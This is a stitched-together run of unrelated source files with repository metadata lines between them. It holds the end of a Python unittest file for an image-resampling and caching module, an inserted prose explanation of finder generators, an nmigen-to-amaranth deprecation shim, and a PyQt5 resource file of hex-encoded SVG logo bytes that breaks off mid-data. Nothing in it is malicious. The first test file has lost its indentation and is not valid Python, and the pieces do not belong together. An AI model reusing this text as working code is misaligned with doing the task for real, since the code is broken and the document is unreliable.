img, scale, rot, shift, input_shape=256)
self.assertEqual(out_img.shape, (256, 256, 3))
def test_resample_grayscale_3d_colors_x_y_diff(self):
img = np.random.random((512, 512, 3))
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
out_img = preproc.resample_in_box(
img, scale, rot, shift, input_shape=(256, 128))
self.assertEqual(out_img.shape, (256, 128, 3))
def test_resample_grayscale_2d_to_colors(self):
        img = np.random.random((512, 512))
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
out_img = preproc.resample_in_box(
img, scale, rot, shift, input_shape=(256, 128, 3))
self.assertEqual(out_img.shape, (256, 128, 3))
def test_resample_grayscale_3d_to_colors(self):
img = np.random.random((512, 512, 1))
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
out_img = preproc.resample_in_box(
img, scale, rot, shift, input_shape=(256, 128, 3))
self.assertEqual(out_img.shape, (256, 128, 3))
def test_resample_colors_to_grayscale(self):
img = np.random.random((512, 512, 3))
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
out_img = preproc.resample_in_box(
img, scale, rot, shift, input_shape=(256, 128, 1))
self.assertEqual(out_img.shape, (256, 128, 1))
def test_4d_input_shape_raises_errors(self):
img = np.random.random((512, 512, 3))
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
with self.assertRaises(ValueError):
preproc.resample_in_box(
img, scale, rot, shift, input_shape=(256, 128, 1, 1))
def test_input_shape_with_crazy_dims_raises_errors(self):
img = np.random.random((512, 512, 3))
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
with self.assertRaises(ValueError):
preproc.resample_in_box(
img, scale, rot, shift, input_shape=(256, 128, 2))
class TestImageResampler(helpers.FileSystemTestCase):
def fullpath(self, *args):
r = self.tempdir
for a in args:
r = r / a
return r
def make_image(self, *args, **kwargs):
image_path = self.fullpath(*args)
size = kwargs.pop('size', (512, 512, 3))
# Random noise image
img = np.random.random(size)
img = np.round(img * 255)
img[img < 0] = 0
img[img > 255] = 255
img = Image.fromarray(img.astype(np.uint8))
image_path.parent.mkdir(exist_ok=True, parents=True)
img.save(str(image_path))
return image_path
def make_mask(self, *args, **kwargs):
mask_path = self.fullpath(*args)
size = kwargs.pop('size', (512, 512))
# Random noise image
mask = np.random.random(size) > 0.5
mask_path.parent.mkdir(exist_ok=True, parents=True)
np.savez(str(mask_path), mask=mask, refined_mask=mask)
return mask_path
def make_resampler(self,
datadir=None,
data_finder=None,
mask_finder=None,
mask_type=None,
test_fraction=None,
validation_fraction=None,
**kwargs):
""" Make the ImageResampler object
:param Path datadir:
The data directory or self.tempdir
:param float validation_fraction:
How many images in the validation set (default 0)
:param \\*\\* kwargs:
Arguments to pass to the load_samplers method of the resampler object
:returns:
The loaded ImageResampler object
"""
if datadir is None:
datadir = self.tempdir
if data_finder is None:
data_finder = preproc.find_raw_data
proc = preproc.ImageResampler()
proc.set_data_loader(datadir, data_finder=data_finder)
if mask_finder is not None:
proc.set_mask_loader(mask_finder=mask_finder, mask_type=mask_type)
proc.load_files()
proc.calc_train_test_split(test_fraction=test_fraction,
validation_fraction=validation_fraction)
proc.load_samplers(**kwargs)
return proc
def test_is_split_under_datadir(self):
self.make_image('foo', '001.jpg')
proc = self.make_resampler(test_fraction=None,
validation_fraction=None,
batch_size=1)
self.assertTrue(proc.is_split_under_datadir(self.tempdir / 'foo'))
self.assertFalse(proc.is_split_under_datadir(self.tempdir / 'bees'))
self.assertFalse(proc.is_split_under_datadir(self.tempdir)) # FIXME: This should work
def test_resample_one_image(self):
self.make_image('foo', '001.jpg')
proc = self.make_resampler(test_fraction=None,
validation_fraction=None,
batch_size=1)
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (1, 1, 256, 256))
def test_resample_several_images(self):
self.make_image('foo', '001.jpg')
self.make_image('foo', '002.jpg')
self.make_image('foo', '003.jpg')
proc = self.make_resampler(test_fraction=None,
validation_fraction=0.333,
batch_size=2)
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (2, 1, 256, 256))
with self.assertRaises(ValueError):
imgs = next(proc.validation_data)
proc.validation_data.batch_size = 1
imgs = next(proc.validation_data)
self.assertEqual(imgs.shape, (1, 1, 256, 256))
self.assertEqual(len(proc.train_data), 2)
self.assertEqual(len(proc.validation_data), 1)
def test_resample_several_images_colored(self):
self.make_image('foo', '001.jpg')
self.make_image('foo', '002.jpg')
self.make_image('foo', '003.jpg')
proc = self.make_resampler(test_fraction=None,
validation_fraction=0.333,
batch_size=2,
input_shape=(256, 256, 3))
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (2, 3, 256, 256))
with self.assertRaises(ValueError):
imgs = next(proc.validation_data)
proc.validation_data.batch_size = 1
imgs = next(proc.validation_data)
self.assertEqual(imgs.shape, (1, 3, 256, 256))
self.assertEqual(len(proc.train_data), 2)
self.assertEqual(len(proc.validation_data), 1)
def test_resample_several_images_one_deleted(self):
i1 = self.make_image('foo', '001.jpg')
i2 = self.make_image('foo', '002.jpg')
i3 = self.make_image('foo', '003.jpg')
proc = self.make_resampler(test_fraction=None,
validation_fraction=0.0,
batch_size=3,
cache_size=0)
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (3, 1, 256, 256))
i1.unlink()
with self.assertRaises(ValueError):
next(proc.train_data)
proc.train_data.batch_size = 2
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (2, 1, 256, 256))
self.assertEqual(set(proc.train_data.files), {i2, i3})
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (2, 1, 256, 256))
self.assertEqual(set(proc.train_data.files), {i2, i3})
def test_resample_several_images_several_deleted(self):
i1 = self.make_image('foo', '001.jpg')
i2 = self.make_image('foo', '002.jpg')
i3 = self.make_image('foo', '003.jpg')
proc = self.make_resampler(test_fraction=None,
validation_fraction=0.0,
batch_size=3,
cache_size=0)
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (3, 1, 256, 256))
i1.unlink()
i3.unlink()
with self.assertRaises(ValueError):
next(proc.train_data)
proc.train_data.batch_size = 1
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (1, 1, 256, 256))
self.assertEqual(proc.train_data.files, [i2])
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (1, 1, 256, 256))
self.assertEqual(proc.train_data.files, [i2])

def test_resample_several_images_large_cache(self):
    self.make_image('foo', '001.jpg')
    self.make_image('foo', '002.jpg')
    self.make_image('foo', '003.jpg')
    proc = self.make_resampler(test_fraction=None,
                               validation_fraction=None,
                               batch_size=3,
                               cache_size=5)
    imgs = next(proc.train_data)
    self.assertEqual(imgs.shape, (3, 1, 256, 256))
    self.assertEqual(len(proc.train_data), 3)
    self.assertEqual(len(proc.train_data.image_cache), 3)

def test_resample_several_images_no_cache(self):
    self.make_image('foo', '001.jpg')
    self.make_image('foo', '002.jpg')
    self.make_image('foo', '003.jpg')
    proc = self.make_resampler(test_fraction=None,
                               validation_fraction=None,
                               batch_size=3,
                               cache_size=None)
    imgs = next(proc.train_data)
    self.assertEqual(imgs.shape, (3, 1, 256, 256))
    self.assertEqual(len(proc.train_data), 3)
    self.assertEqual(len(proc.train_data.image_cache), 0)

def test_resample_several_images_small_cache(self):
    self.make_image('foo', '001.jpg')
    self.make_image('foo', '002.jpg')
    self.make_image('foo', '003.jpg')
    proc = self.make_resampler(test_fraction=None,
                               validation_fraction=None,
                               batch_size=3,
                               cache_size=2)
    imgs = next(proc.train_data)
    self.assertEqual(imgs.shape, (3, 1, 256, 256))
    self.assertEqual(len(proc.train_data), 3)
    self.assertEqual(len(proc.train_data.image_cache), 2)

def test_resample_several_images_deduplicated_cache(self):
    self.make_image('foo', '001.jpg')
    self.make_image('bar', '001.jpg')
    self.make_image('baz', '001.jpg')
    proc = self.make_resampler(test_fraction=None,
                               validation_fraction=None,
                               batch_size=3,
                               cache_size=5)
    imgs = next(proc.train_data)
    self.assertEqual(imgs.shape, (3, 1, 256, 256))
    self.assertEqual(len(proc.train_data), 3)
    self.assertEqual(len(proc.train_data.image_cache), 1)

def test_resample_several_images_alternate_finder(self):
    def find_data(datadir, blacklist=None):
        channeldir = datadir / 'TL Brightfield'
        for tiledir in channeldir.iterdir():
            for image_file in tiledir.iterdir():
                yield image_file

    self.make_image('TL Brightfield', 's01', 's01-001.jpg')
    self.make_image('TL Brightfield', 's02', 's02-001.jpg')
    self.make_image('TL Brightfield', 's02', 's02-002.jpg')
    proc = self.make_resampler(data_finder=find_data,
                               test_fraction=None,
                               validation_fraction=None,
                               batch_size=3,
                               cache_size=0)
    imgs = next(proc.train_data)
    self.assertEqual(imgs.shape, (3, 1, 256, 256))
    self.assertEqual(len(proc.train_data), 3)

def test_resample_several_images_and_masks(self):
    def find_data(datadir, blacklist=None):
        channeldir = datadir / 'Corrected' / 'TL Brightfield'
        for tiledir in channeldir.iterdir():
            for image_file in tiledir.iterdir():
                yield image_file

    def find_masks(datadir, blacklist=None):
        channeldir = datadir / 'colony_mask' / 'TL Brightfield'
        for tiledir in channeldir.iterdir():
            for image_file in tiledir.iterdir():
                yield image_file.stem, image_file

    self.make_image('Corrected', 'TL Brightfield', 's01', 's01-001.jpg')
    self.make_image('Corrected', 'TL Brightfield', 's02', 's02-001.jpg')
    self.make_image('Corrected', 'TL Brightfield', 's02', 's02-002.jpg')
    self.make_mask('colony_mask', 'TL Brightfield', 's01', 's01-001.npz')
    self.make_mask('colony_mask', 'TL Brightfield', 's02', 's02-001.npz')
    proc = self.make_resampler(data_finder=find_data,
                               mask_finder=find_masks,
                               mask_type='file',
                               test_fraction=None,
                               validation_fraction=None,
                               batch_size=2,
                               cache_size=0)
    imgs, masks = next(proc.train_data)
    self.assertEqual(imgs.shape, (2, 1, 256, 256))
    self.assertEqual(masks.shape, (2, 1, 256, 256))
    self.assertEqual(len(proc.train_data), 2)
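The finder callbacks passed as `data_finder` above are plain generators that walk a channel directory with `pathlib` and yield each image path. A standalone sketch of that pattern, using only the standard library (the directory layout is an assumption copied from the test fixtures, and the `sorted()` calls are added here for deterministic order):

```python
import tempfile
from pathlib import Path

def find_data(datadir, blacklist=None):
    # Yield every file under datadir/'TL Brightfield'/<tile>/,
    # mirroring the finder callbacks used in the tests above.
    channeldir = Path(datadir) / 'TL Brightfield'
    for tiledir in sorted(channeldir.iterdir()):
        for image_file in sorted(tiledir.iterdir()):
            yield image_file

# Build a throwaway tree matching the expected layout and walk it.
with tempfile.TemporaryDirectory() as tmp:
    for tile, name in [('s01', 's01-001.jpg'),
                       ('s02', 's02-001.jpg'),
                       ('s02', 's02-002.jpg')]:
        tiledir = Path(tmp) / 'TL Brightfield' / tile
        tiledir.mkdir(parents=True, exist_ok=True)
        (tiledir / name).touch()
    found = [f.name for f in find_data(tmp)]

print(found)  # → ['s01-001.jpg', 's02-001.jpg', 's02-002.jpg']
```

Because the finder is an ordinary generator, a mask finder only differs in what it yields — the tests yield `(image_file.stem, image_file)` pairs so masks can be matched to images by stem.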
529cceb88a40f8d6d5bac678edf1f21d226993de | 211 | py | Python | nmigen/compat/sim/__init__.py | psumesh/nmigen | 7d611b8fc1d9e58853ff268ec38ff8f4131a9774 | ["BSD-2-Clause"] | 528 | 2020-01-28T18:21:00.000Z | 2021-12-09T06:27:51.000Z |
from amaranth.compat.sim import *
from amaranth.compat.sim import __all__
import warnings
warnings.warn("instead of nmigen.compat.sim, use amaranth.compat.sim",
              DeprecationWarning, stacklevel=2)
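The shim above re-exports `amaranth.compat.sim` under the old `nmigen` name and emits a `DeprecationWarning` at import time, with `stacklevel=2` so the warning points at the importing module rather than the shim itself. A minimal, self-contained sketch of that pattern (the `deprecated_alias` helper is hypothetical, written here only to make the warning observable):

```python
import warnings

def deprecated_alias(old, new):
    # Hypothetical helper illustrating the shim's warning call:
    # tell callers of the old module path where the code now lives.
    warnings.warn(f"instead of {old}, use {new}",
                  DeprecationWarning, stacklevel=2)

# Capture the warning instead of printing it, to show it fires.
with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")
    deprecated_alias("nmigen.compat.sim", "amaranth.compat.sim")

print(caught[0].category.__name__)  # → DeprecationWarning
```

By default CPython hides `DeprecationWarning` outside of `__main__` and test runners, which is why the `simplefilter("always")` line is needed to observe it reliably here.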
52b597eeac18941a2b04a6b21ec00edd2a682853 | 35,328 | py | Python | pyqt5_material/resources/logos_rc.py | Virinas-code/pyqt5-material | f393c4d024d67e3a1754ece06c711d5491266978 | ["BSD-2-Clause"] | 8 | 2020-10-21T15:31:38.000Z | 2020-12-01T13:14:37.000Z |
# -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.9.7)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x15\xce\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0d\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\
\x74\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\
\x65\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\
\x0d\x0a\x0d\x0a\x3c\x73\x76\x67\x0d\x0a\x20\x20\x20\x78\x6d\x6c\
\x6e\x73\x3a\x64\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\
\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\
\x74\x73\x2f\x31\x2e\x31\x2f\x22\x0d\x0a\x20\x20\x20\x78\x6d\x6c\
\x6e\x73\x3a\x63\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\
\x65\x61\x74\x69\x76\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\
\x67\x2f\x6e\x73\x23\x22\x0d\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\
\x3a\x72\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\
\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\
\x32\x32\x2d\x72\x64\x66\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\
\x23\x22\x0d\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\
\x6f\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0d\x0a\x20\
\x20\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\
\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\x30\x2f\
\x73\x76\x67\x22\x0d\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\
\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\x73\x6f\x75\x72\x63\x65\x66\
\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\x44\x54\x44\x2f\x73\x6f\x64\
\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\x74\x64\x22\x0d\x0a\x20\x20\
\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\x73\x63\x61\x70\x65\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\x61\x6d\x65\x73\x70\x61\
\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\x70\x65\x22\x0d\x0a\x20\
\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x35\x31\x32\x22\x0d\x0a\x20\
\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x35\x31\x32\x22\x0d\x0a\
\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\
\x31\x33\x35\x2e\x34\x36\x36\x36\x37\x20\x31\x33\x35\x2e\x34\x36\
\x36\x36\x37\x22\x0d\x0a\x20\x20\x20\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x31\x2e\x31\x22\x0d\x0a\x20\x20\x20\x69\x64\x3d\x22\x73\
\x76\x67\x38\x22\x0d\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x30\x2e\x39\x32\x2e\
\x34\x20\x35\x64\x61\x36\x38\x39\x63\x33\x31\x33\x2c\x20\x32\x30\
\x31\x39\x2d\x30\x31\x2d\x31\x34\x22\x0d\x0a\x20\x20\x20\x73\x6f\
\x64\x69\x70\x6f\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\x22\
\x6c\x6f\x67\x6f\x5f\x66\x72\x61\x6d\x65\x2e\x73\x76\x67\x22\x0d\
\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x65\x78\x70\
\x6f\x72\x74\x2d\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x22\x2f\x68\
\x6f\x6d\x65\x2f\x79\x65\x69\x73\x6f\x6e\x2f\x44\x65\x76\x65\x6c\
\x6f\x70\x6d\x65\x6e\x74\x2f\x67\x63\x70\x64\x73\x2f\x62\x63\x69\
\x2d\x75\x6e\x73\x63\x65\x6e\x74\x65\x64\x2f\x61\x73\x73\x65\x74\
\x73\x2f\x6c\x6f\x67\x6f\x2e\x70\x6e\x67\x22\x0d\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x65\x78\x70\x6f\x72\x74\x2d\
\x78\x64\x70\x69\x3d\x22\x39\x36\x22\x0d\x0a\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x65\x78\x70\x6f\x72\x74\x2d\x79\x64\
\x70\x69\x3d\x22\x39\x36\x22\x3e\x0d\x0a\x20\x20\x3c\x64\x65\x66\
\x73\x0d\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\
\x32\x22\x20\x2f\x3e\x0d\x0a\x20\x20\x3c\x73\x6f\x64\x69\x70\x6f\
\x64\x69\x3a\x6e\x61\x6d\x65\x64\x76\x69\x65\x77\x0d\x0a\x20\x20\
\x20\x20\x20\x69\x64\x3d\x22\x62\x61\x73\x65\x22\x0d\x0a\x20\x20\
\x20\x20\x20\x70\x61\x67\x65\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x66\
\x66\x66\x66\x66\x66\x22\x0d\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\
\x64\x65\x72\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x36\x36\x36\x36\x36\
\x36\x22\x0d\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\x6f\
\x70\x61\x63\x69\x74\x79\x3d\x22\x31\x2e\x30\x22\x0d\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\
\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\x2e\x30\x22\x0d\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\
\x65\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\
\x22\x30\x2e\x39\x36\x32\x36\x30\x34\x33\x33\x22\x0d\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x78\x3d\x22\
\x32\x36\x33\x2e\x35\x36\x38\x36\x33\x22\x0d\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x79\x3d\x22\x31\x35\
\x34\x2e\x38\x39\x36\x34\x39\x22\x0d\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\x6d\x65\x6e\x74\
\x2d\x75\x6e\x69\x74\x73\x3d\x22\x70\x78\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\x72\x72\x65\
\x6e\x74\x2d\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\x65\x72\x31\
\x22\x0d\x0a\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\x69\x64\
\x3d\x22\x66\x61\x6c\x73\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x77\
\x69\x64\x74\x68\x3d\x22\x31\x39\x32\x30\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\
\x77\x2d\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x30\x30\x34\x22\x0d\
\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\
\x69\x6e\x64\x6f\x77\x2d\x78\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\
\x77\x2d\x79\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x6d\x61\
\x78\x69\x6d\x69\x7a\x65\x64\x3d\x22\x31\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x75\x6e\x69\x74\x73\x3d\x22\x70\x78\x22\x0d\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x73\x68\x6f\x77\
\x70\x61\x67\x65\x73\x68\x61\x64\x6f\x77\x3d\x22\x66\x61\x6c\x73\
\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x75\x69\
\x64\x65\x73\x3d\x22\x66\x61\x6c\x73\x65\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x73\x6e\x61\x70\x2d\
\x62\x62\x6f\x78\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x62\x62\x6f\x78\x2d\
\x70\x61\x74\x68\x73\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x62\x62\x6f\x78\
\x2d\x6e\x6f\x64\x65\x73\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x73\x6e\x61\
\x70\x2d\x62\x62\x6f\x78\x2d\x6d\x69\x64\x70\x6f\x69\x6e\x74\x73\
\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x73\x6e\x61\x70\x2d\x62\x62\x6f\x78\
\x2d\x65\x64\x67\x65\x2d\x6d\x69\x64\x70\x6f\x69\x6e\x74\x73\x3d\
\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x6f\x62\x6a\x65\x63\x74\x2d\x70\x61\x74\
\x68\x73\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x73\x6e\x61\x70\x2d\x69\x6e\
\x74\x65\x72\x73\x65\x63\x74\x69\x6f\x6e\x2d\x70\x61\x74\x68\x73\
\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x73\x6e\x61\x70\x2d\x6d\x69\x64\x70\
\x6f\x69\x6e\x74\x73\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x73\x6e\x61\x70\
\x2d\x73\x6d\x6f\x6f\x74\x68\x2d\x6e\x6f\x64\x65\x73\x3d\x22\x74\
\x72\x75\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\
\x61\x70\x65\x3a\x73\x6e\x61\x70\x2d\x6f\x62\x6a\x65\x63\x74\x2d\
\x6d\x69\x64\x70\x6f\x69\x6e\x74\x73\x3d\x22\x74\x72\x75\x65\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\
\x73\x6e\x61\x70\x2d\x63\x65\x6e\x74\x65\x72\x3d\x22\x74\x72\x75\
\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\x66\x69\x74\x2d\x6d\x61\x72\
\x67\x69\x6e\x2d\x74\x6f\x70\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x66\x69\x74\x2d\x6d\x61\x72\x67\x69\x6e\x2d\x6c\x65\x66\
\x74\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x20\x20\x66\x69\x74\x2d\
\x6d\x61\x72\x67\x69\x6e\x2d\x72\x69\x67\x68\x74\x3d\x22\x30\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x66\x69\x74\x2d\x6d\x61\x72\x67\x69\
\x6e\x2d\x62\x6f\x74\x74\x6f\x6d\x3d\x22\x30\x22\x20\x2f\x3e\x0d\
\x0a\x20\x20\x3c\x6d\x65\x74\x61\x64\x61\x74\x61\x0d\x0a\x20\x20\
\x20\x20\x20\x69\x64\x3d\x22\x6d\x65\x74\x61\x64\x61\x74\x61\x35\
\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x52\x44\x46\
\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x63\x63\x3a\x57\x6f\x72\
\x6b\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\
\x61\x62\x6f\x75\x74\x3d\x22\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x69\x6d\
\x61\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\x3c\x2f\x64\x63\x3a\
\x66\x6f\x72\x6d\x61\x74\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x3c\x64\x63\x3a\x74\x79\x70\x65\x0d\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x72\x65\x73\x6f\x75\x72\
\x63\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\
\x6f\x72\x67\x2f\x64\x63\x2f\x64\x63\x6d\x69\x74\x79\x70\x65\x2f\
\x53\x74\x69\x6c\x6c\x49\x6d\x61\x67\x65\x22\x20\x2f\x3e\x0d\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\
\x65\x20\x2f\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x63\x63\
\x3a\x57\x6f\x72\x6b\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x72\x64\
\x66\x3a\x52\x44\x46\x3e\x0d\x0a\x20\x20\x3c\x2f\x6d\x65\x74\x61\
\x64\x61\x74\x61\x3e\x0d\x0a\x20\x20\x3c\x67\x0d\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\
\x3d\x22\x43\x61\x70\x61\x20\x31\x22\x0d\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\
\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0d\x0a\x20\x20\x20\x20\
\x20\x69\x64\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0d\x0a\x20\x20\
\x20\x20\x20\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x3d\x22\x74\x72\
\x61\x6e\x73\x6c\x61\x74\x65\x28\x32\x31\x2e\x37\x30\x30\x32\x33\
\x37\x2c\x2d\x39\x32\x32\x2e\x35\x31\x39\x35\x34\x29\x22\x3e\x0d\
\x0a\x20\x20\x20\x20\x3c\x70\x61\x74\x68\x0d\x0a\x20\x20\x20\x20\
